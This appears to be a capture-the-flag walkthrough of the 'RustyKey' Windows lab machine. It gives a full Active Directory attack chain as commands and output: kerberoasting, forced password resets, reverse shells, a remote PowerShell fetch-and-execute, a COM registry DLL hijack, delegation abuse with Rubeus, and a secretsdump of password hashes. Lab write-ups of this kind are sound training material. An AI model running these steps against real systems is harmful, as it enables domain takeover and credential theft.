Rustykey (Windows Hard)

This Windows Hard box starts off assumed breach. While enumerating with the credentials you find that NTLM is disabled. Using your credentials you’re able to obtain a kerberos ticket that lets you get a bloodhound dump and further enumerate the machine. Once done, you’re able to kerberoast SPNs(Some did timeroast) and obtain some hashes, which one of them cracks to cleartext for IT-Computer3$. Using your new found credentials you’re able to abuse DACLs that allows our user to remove objects from the Protected Objects group. Thus allowing for ForceChangePassword and after successfully changing the password for bb.morgan, we are able to get a kerberos ticket, setup our krb5.conf and evil-winrm onto the box.

Enumeration as bb.morgan shows very little, yet we had a user ee.reed in the Support group. After changing his password, creating a reverse shell and using RunasCs.exe, we’re able to get a shell as ee.reed. Using PrivescCheck.ps1 shows us a COM Registry component we have FullAccess over. Abusing this gets us a reverse shell as mm.turner. Looking back in bloodhound we see that mm.turner is apart of the DelegationManagers group. This allows us to AddAllowedToAct on the domain. Once we add the attribute, we use Rubeus.exe and perform Resource-Based Constrained Delegation. This gets us a TGS which we then can use to secretsdump the domain.

As is common in real life Windows pentests, you will start the RustyKey box with credentials for the following account: rr.parker / 8#t5HE8L!W3A

Initial Nmap

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-29 04:15:29Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49692/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49727/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 51928/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 27628/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 63867/udp): CLEAN (Timeout)
|   Check 4 (port 46581/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
|   date: 2025-06-29T04:16:24
|_  start_date: N/A
|_clock-skew: 0s

Many ports open, but we can gather the domain name from it being rustykey.htb.

Enum of rr.parker

With his creds I simply grabbed a TGT for him since NTLM is disabled and exported it for use.

konoha# impacket-getTGT 'rustykey.htb/rr.parker:8#t5HE8L!W3A' -dc-ip 10.10.11.75
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in rr.parker.ccache
konoha# export KRB5CCNAME=./rr.parker.ccache

SMB didn’t let us authenticate, but LDAP worked so we can get a bloodhound dump.

konoha# nxc smb 10.10.11.75 -d rustykey.htb -k --use-kcache
SMB         10.10.11.75     445    10.10.11.75      [*]  x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.10.11.75     445    10.10.11.75      [-] rustykey.htb\ from ccache KDC_ERR_S_PRINCIPAL_UNKNOWN
konoha# nxc ldap 10.10.11.75 -d rustykey.htb -k --use-kcache
LDAP        10.10.11.75     389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        10.10.11.75     389    DC               [+] rustykey.htb\rr.parker from ccache

konoha# bloodhound-python -d rustykey.htb -u 'rr.parker' -k -no-pass -ns 10.10.11.75 --zip -c Group,LocalAdmin,Session,Trusts,DCOM,RDP,PSRemote,LoggedOn,Container,ObjectProps,ACL
<SNIP>
INFO: Done in 00M 10S
INFO: Compressing output into 20250701022158_bloodhound.zip

No way out so it seemed!!

After loading up the data, we didn’t find much on our user. Never the less, we have credentials we can get a list of users and try kerberoasting.

konoha# nxc ldap 10.10.11.75 -d rustykey.htb -k --use-kcache --users --computers
LDAP        10.10.11.75     389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        10.10.11.75     389    DC               [+] rustykey.htb\rr.parker from ccache
LDAP        10.10.11.75     389    DC               [*] Skipping disabled account: krbtgt
LDAP        10.10.11.75     389    DC               [*] Total of records returned 0
LDAP        10.10.11.75     389    DC               [*] Enumerated 11 domain users: rustykey.htb
LDAP        10.10.11.75     389    DC               -Username-                    -Last PW Set-       -BadPW-  -Description-
LDAP        10.10.11.75     389    DC               Administrator                 2025-06-04 17:52:22 0        Built-in account for administering the computer/domain
LDAP        10.10.11.75     389    DC               Guest                         <never>             0        Built-in account for guest access to the computer/domain
LDAP        10.10.11.75     389    DC               krbtgt                        2024-12-26 18:53:40 0        Key Distribution Center Service Account
LDAP        10.10.11.75     389    DC               rr.parker                     2025-06-04 17:54:15 0
LDAP        10.10.11.75     389    DC               mm.turner                     2024-12-27 04:18:39 0
LDAP        10.10.11.75     389    DC               bb.morgan                     2025-07-01 02:16:40 0
LDAP        10.10.11.75     389    DC               gg.anderson                   2025-07-01 02:16:40 0
LDAP        10.10.11.75     389    DC               dd.ali                        2025-07-01 02:16:40 0
LDAP        10.10.11.75     389    DC               ee.reed                       2025-07-01 02:16:40 0
LDAP        10.10.11.75     389    DC               nn.marcos                     2024-12-27 05:34:50 0
LDAP        10.10.11.75     389    DC               backupadmin                   2024-12-29 18:30:18 11
LDAP        10.10.11.75     389    DC               [*] Total records returned: 16
LDAP        10.10.11.75     389    DC               DC$
LDAP        10.10.11.75     389    DC               Support-Computer1$
LDAP        10.10.11.75     389    DC               Support-Computer2$
LDAP        10.10.11.75     389    DC               Support-Computer3$
LDAP        10.10.11.75     389    DC               Support-Computer4$
LDAP        10.10.11.75     389    DC               Support-Computer5$
LDAP        10.10.11.75     389    DC               Finance-Computer1$
LDAP        10.10.11.75     389    DC               Finance-Computer2$
LDAP        10.10.11.75     389    DC               Finance-Computer3$
LDAP        10.10.11.75     389    DC               Finance-Computer4$
LDAP        10.10.11.75     389    DC               Finance-Computer5$
LDAP        10.10.11.75     389    DC               IT-Computer1$
LDAP        10.10.11.75     389    DC               IT-Computer2$
LDAP        10.10.11.75     389    DC               IT-Computer3$
LDAP        10.10.11.75     389    DC               IT-Computer4$
LDAP        10.10.11.75     389    DC               IT-Computer5$

Lets make a list and try all these users and computers.

konoha# impacket-GetUserSPNs -dc-ip 10.10.11.75 'rustykey.htb/rr.parker' -usersfile user.lst -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*krbtgt$RUSTYKEY.HTB$krbtgt*$172f44f5c03cb0964a08add4f0727799$<SNIP>
[-] Principal: rr.parker - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: mm.turner - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: bb.morgan - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: gg.anderson - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: dd.ali - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: ee.reed - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: nn.marcos - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: backupadmin - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*DC$$RUSTYKEY.HTB$DC$*$7664306543510d4896b1e31f823a0256$<SNIP>
<SNIP>

This returns many hashes that we can try to crack offline. When we do we get one that cracks.

konoha# hashcat HASHES --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$krb5tgs$23$*IT-Computer3$$RUSTYKEY.HTB$IT-Computer3$*$1424a46c534b22e4a188835b00461505$8ebe6eacca6940cec84b7fd9a6<SNIP>:<SNIP>

We now have new credentials to IT-Computer3$. We can look back at Bloodhound and see what permissions we have and looking as we have some interesting ones, we can start there.

From this we have the following:

• AddSelf
  • HelpDesk
• ForceChangePassword
  • bb.morgan
  • ee.reed
  • gg.anderson
    • GenericWrite
      • dd.ali
• AddMember
  • Protected Objects

So we can add ourselves to HelpDesk group and then we can remove the IT and Support groups from the Protected Objects group. This will let us change the passwords for these users and requests TGTs for them. I created a little script that lets me do all this at once.

Error states the entry already exists, as the comptuer already has been added to the HelpDesk group already

konoha# ./runRCE.sh
Retriving TGT
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in IT-Computer3$.ccache
Exporting Ticket
Adding Computer to Helpdesk
[+] Connection URL: ldap+kerberos-ccache://rustykey.htb\IT-Computer3%24:.%2FIT-Computer3%24.ccache@DC.rustykey.htb/?serverip=10.10.11.75&dc=10.10.11.75
[*] Trying to connect to DC.rustykey.htb...
[+] Connection successful
Traceback (most recent call last):
  File "/root/.local/bin/bloodyAD", line 8, in <module>
    sys.exit(main())
             ~~~~^^
  File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/main.py", line 210, in main
    output = args.func(conn, **params)
  File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/cli_modules/add.py", line 252, in groupMember
    conn.ldap.bloodymodify(group, {"member": [(Change.ADD.value, member_transformed)]})
    ~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/network/ldap.py", line 301, in bloodymodify
    raise err
msldap.commons.exceptions.LDAPModifyException: LDAP Modify operation failed on DN CN=HelpDesk,CN=Users,DC=rustykey,DC=htb! Result code: "entryAlreadyExists" Reason: "b'00000562: UpdErr: DSID-031A11DA, problem 6005 (ENTRY_EXISTS), data 0\n\x00'"
Removing Support and IT from Protected Objects
[+] Connection URL: ldap+kerberos-ccache://rustykey.htb\IT-Computer3%24:.%2FIT-Computer3%24.ccache@DC.rustykey.htb/?serverip=10.10.11.75&dc=10.10.11.75
[*] Trying to connect to DC.rustykey.htb...
[+] Connection successful
[-] CN=IT,CN=USERS,DC=RUSTYKEY,DC=HTB removed from CN=PROTECTED OBJECTS,CN=USERS,DC=RUSTYKEY,DC=HTB
[+] Connection URL: ldap+kerberos-ccache://rustykey.htb\IT-Computer3%24:.%2FIT-Computer3%24.ccache@DC.rustykey.htb/?serverip=10.10.11.75&dc=10.10.11.75
[*] Trying to connect to DC.rustykey.htb...
[+] Connection successful
[-] CN=SUPPORT,CN=USERS,DC=RUSTYKEY,DC=HTB removed from CN=PROTECTED OBJECTS,CN=USERS,DC=RUSTYKEY,DC=HTB
Setting Password:P@ssw0rd123! for ee.reed,bb.morgan,gg.anderson. Grab a TGT afterwards.
[+] Connection URL: ldap+kerberos-ccache://rustykey.htb\IT-Computer3%24:.%2FIT-Computer3%24.ccache@DC.rustykey.htb/?serverip=10.10.11.75&dc=10.10.11.75
[*] Trying to connect to DC.rustykey.htb...
[+] Connection successful
[+] Password changed successfully!
[+] Connection URL: ldap+kerberos-ccache://rustykey.htb\IT-Computer3%24:.%2FIT-Computer3%24.ccache@DC.rustykey.htb/?serverip=10.10.11.75&dc=10.10.11.75
[*] Trying to connect to DC.rustykey.htb...
[+] Connection successful
[+] Password changed successfully!
[+] Connection URL: ldap+kerberos-ccache://rustykey.htb\IT-Computer3%24:.%2FIT-Computer3%24.ccache@DC.rustykey.htb/?serverip=10.10.11.75&dc=10.10.11.75
[*] Trying to connect to DC.rustykey.htb...
[+] Connection successful
[+] Password changed successfully!

Now we can request a TGT and try to get on the box seeing how most of the users are in the Remote Management group. Yet, if we look at the attributes set for gg.anderson, their account is disabled and we have no way of removing that User Account Control.

uSNCreated: 20637
userAccountControl: ACCOUNTDISABLE; NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
userPrincipalName: gg.anderson@rustykey.htb

So for ee.reed and dd.ali, even getting a TGT won’t allow us to log in. The only ticket to work was bb.morgan.

Foothold with bb.morgan

Once we have the correct krb5.conf we can get on the box. You can use nxc to generate a krb file as well with this TGT.

konoha# nxc smb DC.rustykey.htb -d rustykey.htb -k --use-kcache --generate-krb5-file rustykey.conf
SMB         DC.rustykey.htb 445    DC               [*]  x64 (name:DC) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         DC.rustykey.htb 445    DC               [+] rustykey.htb\bb.morgan from ccache
konoha# cat rustykey.conf

[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = RUSTYKEY.HTB

[realms]
    RUSTYKEY.HTB = {
        kdc = dc.rustykey.htb
        admin_server = dc.rustykey.htb
        default_domain = rustykey.htb
    }

[domain_realm]
    .rustykey.htb = RUSTYKEY.HTB
    rustykey.htb = RUSTYKEY.HTB

Once do we can WinRM onto the box.

Initially, our enumeration doesn’t find anything other then a 7-Zip directory in Program Files, we’ll come back to that and move on to the users we have the ability to change the password of. Looking at all the users we have, ee.reed is in the Support group. We can laterally move to him and see what kind of permissions he has.

*Evil-WinRM* PS C:\programdata> .\RCs.exe ee.reed P@ssw0rd123! "C:\ProgramData\a.exe" -t 0
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-6658a90$\Default
[+] Async process 'C:\ProgramData\a.exe' with pid 13996 created in background.
*Evil-WinRM* PS C:\programdata>

-----

konoha# rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.75] 52766
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
rustykey\ee.reed

Shell as ee.reed

Starting with enumeration again,this time using PrivescCheck.ps1 we find a COM Registry.

PS C:\Windows\system32> iwr http://10.10.14.7:81/PrivescCheck.ps1 -UseBasicParsing | iex
iwr http://10.10.14.7:81/PrivescCheck.ps1 -UseBasicParsing | iex
PS C:\Windows\system32> Invoke-PrivescCheck
<SNIP>
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? COM server registry permissions                   ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the current user has any modification rights   ?
? on a COM server in the registry. This may not necessarily    ?
? result in a privilege escalation. Further analysis is        ?
? required.                                                    ?
????????????????????????????????????????????????????????????????
<SNIP>
Id                : 23170f69-40c1-278a-1000-000100020000
Name              : 7-Zip Shell Extension
RegPath           : HKLM\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}
HandlerType       : InprocServer32
FTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}\InprocServer32
HandlerDataType   : FilePath
HandlerData       : C:\Program Files\7-Zip\7-zip.dll
ModifiablePath    : HKLM\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}\InprocServer32
IdentityReference : RUSTYKEY\Support (S-1-5-21-3316070415-896458127-4139322052-1132)
Permissions       : AllAccess

Funny enough this was seen when we had a session as bb.morgan. We have AllAccess so we can use some classic DLL hijacking and replace this value within registry. After creating a simple dll using msfvenom we can upload it, setup a listener and edit the value..

PS C:\Windows\system32> reg add "HKLM\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}\InprocServer32" /ve /t REG_SZ /d "C:\ProgramData\a.dll"
reg add "HKLM\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}\InprocServer32" /ve /t REG_SZ /d "C:\ProgramData\a.dll"
Value  exists, overwrite(Yes/No)? Yes
The operation completed successfully.
PS C:\Windows\system32> reg query "HKLM\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}\" /ve /s
reg query "HKLM\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}\" /ve /s

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}
    (Default)    REG_SZ    7-Zip Shell Extension

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}\InprocServer32
    (Default)    REG_SZ    C:\ProgramData\a.dll

Waiting a minute or two results in getting a shell as mm.turner.

konoha# rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.75] 52428
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows>whoami
whoami
rustykey\mm.turner

Shell as mm.turner

Interesting, we now have a shell as mm.turner, and if we look back at Bloodhound we see he’s apart of DelegationManagers. That being said, we have AddAllowedToAct to the DC$. So essentially here we have RBCD(Resource-Based Constrained Delegation). This article helps explain the theory, yet what we need to do is set the attribute PrincipalsAllowedToDelegateToAccount on the DC$ to allow for the computer account we control (IT-Computer3$), and then impersonate and high level user. Using S4U2Self+S4U2proxy we’re able to get a TGS and then use that to authenticate to the DC$. As mm.turner, we can set the attribute for the DC$, then for the rbcd we will be using Rubeus.exe.

Mom said I’m allowed too Privesc!!

Let’s go ahead a get the TGS as backupadmin and then we can secretsdump.

PS C:\ProgramData> $targetComputer = "CN=DC,OU=DOMAIN CONTROLLERS,DC=RUSTYKEY,DC=HTB"
$targetComputer = "CN=DC,OU=DOMAIN CONTROLLERS,DC=RUSTYKEY,DC=HTB"
PS C:\ProgramData> Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount "CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb"
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount "CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb"
PS C:\ProgramData> .\Rub.exe hash /domain:rustykey.htb /user:IT-Computer3$ /password:<SNIP>
.\Rub.exe hash /domain:rustykey.htb /user:IT-Computer3$ /password:<SNIP>

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : <SNIP>
[*] Input username             : IT-Computer3$
[*] Input domain               : rustykey.htb
[*] Salt                       : RUSTYKEY.HTBhostit-computer3.rustykey.htb
[*]       rc4_hmac             : <SNIP>
[*]       aes128_cts_hmac_sha1 : <SNIP>
[*]       aes256_cts_hmac_sha1 : <SNIP>
[*]       des_cbc_md5          : <SNIP>

PS C:\ProgramData>./Rub.exe s4u /nowrap /impersonateuser:backupadmin /domain:rustykey.htb /user:IT-Computer3$ /password:<SNIP> /rc4:<SNIP>  /msdsspn:host/dc.rustykey.htb /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: S4U

[*] Using rc4_hmac hash: <SNIP>
[*] Building AS-REQ (w/ preauth) for: 'rustykey.htb\IT-Computer3$'
[*] Using domain controller: fe80::bd5e:24aa:d271:1fea%11:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFmDCCBZSgAwIBBaEDAgEWooIEqDCCBKRhggSgMIIEnKADAgEFoQ4bDFJVU1RZS0VZLkhUQqIhMB
                                        <SNIP>


[*] Action: S4U

[*] Building S4U2self request for: 'IT-Computer3$@RUSTYKEY.HTB'
[*] Using domain controller: dc.rustykey.htb (fe80::bd5e:24aa:d271:1fea%11)
[*] Sending S4U2self request to fe80::bd5e:24aa:d271:1fea%11:88
[+] S4U2self success!
[*] Got a TGS for 'backupadmin' to 'IT-Computer3$@RUSTYKEY.HTB'
[*] base64(ticket.kirbi):

      doIFtjCCBbKgAwIBBaEDAgEWooIEzzCCBMthggTHMIIEw6ADAgEFoQ4bDFJVU1RZS0VZLkhUQqIaMB
                                        <SNIP>

[*] Impersonating user 'backupadmin' to target SPN 'host/dc.rustykey.htb'
[*] Building S4U2proxy request for service: 'host/dc.rustykey.htb'
[*] Using domain controller: dc.rustykey.htb (fe80::bd5e:24aa:d271:1fea%11)
[*] Sending S4U2proxy request to domain controller fe80::bd5e:24aa:d271:1fea%11:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'host/dc.rustykey.htb':

      doIGfjCCBnqgAwIBBaEDAgEWooIFjzCCBYthggWHMIIFg6ADAgEFoQ4bDFJVU1RZS0VZLkhUQqIiML
                                        <SNIP>
[+] Ticket successfully imported!

For myself, I like to use /ptt which does pass-the-ticket but allows me to know that Rubeus succeeded. Then I can look at the ticket on the host system to make sure everything is correct.

This gets us a TGS for the user backupadmin, from here we can import and secretsdump. (using a script for my b64 TGS)

konoha# source ./converITAll.sh doIGfjCCBnqgAwIBBaEDAgEWooIFjzCCBYthggWHMIIFg6ADAgEFoQ4bDFJ<SNIP>
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] converting kirbi to ccache...
[+] done
Ticket cache: FILE:./Admin.ccache
Default principal: backupadmin@RUSTYKEY.HTB

Valid starting       Expires              Service principal
07/01/2025 19:55:02  07/02/2025 05:55:02  host/dc.rustykey.htb@RUSTYKEY.HTB
	renew until 07/08/2025 19:55:02
konoha# impacket-secretsdump @dc.rustykey.htb -k -no-pass -dc-ip 10.10.11.75
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x94660760272ba2c07b13992b57b432d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<SNIP>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::